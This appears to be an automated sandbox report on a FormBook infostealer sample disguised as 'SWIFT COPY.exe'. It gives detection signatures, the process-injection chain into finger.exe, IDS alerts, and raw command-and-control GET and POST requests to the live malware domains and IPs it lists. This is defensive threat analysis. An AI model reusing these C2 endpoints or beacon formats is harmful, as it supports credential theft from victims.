Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SWIFT COPY.exe

Overview

General Information

Sample name:SWIFT COPY.exe
Analysis ID:1578068
MD5:180a3e0827818592194c3a46dd8e9dd7
SHA1:fa90e6b8c4a962d3cb324cf23afe68845d6e5013
SHA256:b46e3f5fe8669966df0df40ef2ff40a1de2f8141da974f8058eb03c2897feacf
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SWIFT COPY.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\SWIFT COPY.exe" MD5: 180A3E0827818592194C3A46DD8E9DD7)
    • SWIFT COPY.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\SWIFT COPY.exe" MD5: 180A3E0827818592194C3A46DD8E9DD7)
      • XwGiOcrCkQ.exe (PID: 4092 cmdline: "C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • finger.exe (PID: 8008 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • XwGiOcrCkQ.exe (PID: 6016 cmdline: "C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8168 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.3579225872.0000000002C10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3579265567.0000000002C60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.2224196116.0000000000E10000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            3.2.SWIFT COPY.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.SWIFT COPY.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T08:39:48.421435+010020507451Malware Command and Control Activity Detected192.168.2.449884134.122.191.18780TCP
                2024-12-19T08:40:53.098661+010020507451Malware Command and Control Activity Detected192.168.2.449763104.21.86.11180TCP
                2024-12-19T08:41:26.835082+010020507451Malware Command and Control Activity Detected192.168.2.449845194.58.112.17480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T08:39:48.421435+010028554651A Network Trojan was detected192.168.2.449884134.122.191.18780TCP
                2024-12-19T08:40:53.098661+010028554651A Network Trojan was detected192.168.2.449763104.21.86.11180TCP
                2024-12-19T08:41:26.835082+010028554651A Network Trojan was detected192.168.2.449845194.58.112.17480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-19T08:41:18.792202+010028554641A Network Trojan was detected192.168.2.449825194.58.112.17480TCP
                2024-12-19T08:41:21.459881+010028554641A Network Trojan was detected192.168.2.449831194.58.112.17480TCP
                2024-12-19T08:41:24.187165+010028554641A Network Trojan was detected192.168.2.449836194.58.112.17480TCP
                2024-12-19T08:41:34.452861+010028554641A Network Trojan was detected192.168.2.449863134.122.191.18780TCP
                2024-12-19T08:41:37.124839+010028554641A Network Trojan was detected192.168.2.449869134.122.191.18780TCP
                2024-12-19T08:41:39.796635+010028554641A Network Trojan was detected192.168.2.449875134.122.191.18780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: SWIFT COPY.exeVirustotal: Detection: 34%Perma Link
                Source: SWIFT COPY.exeReversingLabs: Detection: 63%
                Source: Yara matchFile source: 3.2.SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3579225872.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3579265567.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2224196116.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3579400562.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2227839219.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: SWIFT COPY.exeJoe Sandbox ML: detected
                Source: SWIFT COPY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SWIFT COPY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: SWIFT COPY.exe, 00000003.00000002.2224493512.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000002.3578837135.000000000083E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XwGiOcrCkQ.exe, 00000006.00000002.3579093202.0000000000E6E000.00000002.00000001.01000000.0000000C.sdmp, XwGiOcrCkQ.exe, 00000008.00000000.2293359567.0000000000E6E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: SWIFT COPY.exe, 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2223664061.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2227019502.0000000002E74000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SWIFT COPY.exe, SWIFT COPY.exe, 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2223664061.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2227019502.0000000002E74000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: SWIFT COPY.exe, 00000003.00000002.2224493512.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000002.3578837135.000000000083E000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0288C7B0 FindFirstFileW,FindNextFileW,FindClose,7_2_0288C7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then xor eax, eax7_2_02879F20
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then pop edi7_2_0287E3A1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then mov ebx, 00000004h7_2_02F704BE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49763 -> 104.21.86.111:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49763 -> 104.21.86.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49825 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49831 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49836 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49863 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49869 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49845 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49845 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49875 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49884 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49884 -> 134.122.191.187:80
                Source: DNS query: www.pbfgm.xyz
                Source: Joe Sandbox ViewIP Address: 194.58.112.174 194.58.112.174
                Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /fjd6/?Ir=beVfoldUF3/aok0FdWpvJC8HGsWBcAhapzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK2FUvh8SZisD6hpiODREZagit+S+U5/mb9Z4=&M8Gl=KPotmx2p0n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.pbfgm.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1ne4/?Ir=Xmf7DtAQ/BnKPHUir9F/DJAWe/lobbRTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5jUfoqKY7Fz8p0/9FqW//8AiMTO0G3RJpL4=&M8Gl=KPotmx2p0n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.elinor.clubConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /s6zh/?Ir=3lPbUJ/4EMFnMU367dk2ybPqIMylLyFhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsMKMrA2+vlNwKuHc+NKCv2NtQORSHn8saFjw=&M8Gl=KPotmx2p0n HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.smalleyes.icuConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.pbfgm.xyz
                Source: global trafficDNS traffic detected: DNS query: www.phdcoach.pro
                Source: global trafficDNS traffic detected: DNS query: www.elinor.club
                Source: global trafficDNS traffic detected: DNS query: www.smalleyes.icu
                Source: unknownHTTP traffic detected: POST /1ne4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.elinor.clubOrigin: http://www.elinor.clubContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 199Cache-Control: no-cacheReferer: http://www.elinor.club/1ne4/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 49 72 3d 61 6b 33 62 41 61 73 75 7a 51 54 78 45 6c 6f 4e 72 75 42 61 4e 34 45 4c 5a 66 67 7a 54 37 64 35 67 46 39 47 31 79 49 51 38 65 5a 49 43 4b 58 41 76 68 61 4e 31 44 4d 56 4c 65 35 57 4b 56 51 56 49 49 6f 63 5a 53 4e 57 30 56 41 76 72 32 2b 6e 35 6a 6c 70 78 42 5a 72 6e 71 2b 77 2b 54 4c 6c 31 45 43 79 4a 4b 57 5a 2b 35 30 49 47 43 61 72 58 45 39 44 37 36 37 45 4d 55 37 47 52 58 32 74 42 33 48 6b 4b 51 55 50 65 48 45 64 49 38 43 57 6b 56 4e 63 37 4d 4e 77 70 73 5a 49 45 45 49 58 4f 4e 47 4b 57 68 6b 75 62 4e 53 69 52 47 78 58 57 2f 35 4a 73 55 6e 6f 47 62 77 54 2b 4a 64 4b 42 77 3d 3d Data Ascii: Ir=ak3bAasuzQTxEloNruBaN4ELZfgzT7d5gF9G1yIQ8eZICKXAvhaN1DMVLe5WKVQVIIocZSNW0VAvr2+n5jlpxBZrnq+w+TLl1ECyJKWZ+50IGCarXE9D767EMU7GRX2tB3HkKQUPeHEdI8CWkVNc7MNwpsZIEEIXONGKWhkubNSiRGxXW/5JsUnoGbwT+JdKBw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 07:40:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lPshYalhrtD9Y10kN9TS1MuLLXFbXNssi%2Bzcc2WGAEMAB8aplepjKd7Y%2BPmmZzy3ufoTrcjYhx1n0tEx9%2FLH3kLBFMi9CrejcvL4S8uOaj65j6HuXRYsd%2F5rzb%2BRU5L7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f45bf3ba8c8ef9d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1793&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frien
                Source: finger.exe, 00000007.00000002.3579976646.0000000003D98000.00000004.10000000.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000008.00000002.3579571028.00000000039A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://elinor.club/1ne4/?Ir=Xmf7DtAQ/BnKPHUir9F/DJAWe/lobbRTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: SWIFT COPY.exe, 00000000.00000002.1891587045.0000000008060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: XwGiOcrCkQ.exe, 00000008.00000002.3579246443.0000000002E00000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smalleyes.icu
                Source: XwGiOcrCkQ.exe, 00000008.00000002.3579246443.0000000002E00000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smalleyes.icu/s6zh/
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: SWIFT COPY.exe, 00000000.00000002.1891816034.00000000091F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: SWIFT COPY.exeString found in binary or memory: https://api.libertyreserve.com/beta/xml/
                Source: SWIFT COPY.exeString found in binary or memory: https://api.libertyreserve.com/beta/xml/accountname.aspx
                Source: SWIFT COPY.exeString found in binary or memory: https://api.libertyreserve.com/beta/xml/balance.aspx
                Source: SWIFT COPY.exeString found in binary or memory: https://api.libertyreserve.com/beta/xml/history.aspx
                Source: SWIFT COPY.exe, 00000000.00000002.1886186642.0000000002B79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/history.aspxS
                Source: SWIFT COPY.exeString found in binary or memory: https://api.libertyreserve.com/beta/xml/transfer.aspx
                Source: finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: finger.exe, 00000007.00000002.3578499987.0000000002A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: finger.exe, 00000007.00000002.3578499987.0000000002A4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: finger.exe, 00000007.00000002.3578499987.0000000002A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: finger.exe, 00000007.00000002.3578499987.0000000002A4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: finger.exe, 00000007.00000002.3578499987.0000000002A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: finger.exe, 00000007.00000002.3578499987.0000000002A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: finger.exe, 00000007.00000003.2405443560.00000000079C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: SWIFT COPY.exeString found in binary or memory: https://sci.libertyreserve.com/
                Source: finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: finger.exe, 00000007.00000003.2415607709.00000000079E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 3.2.SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3579225872.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3579265567.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
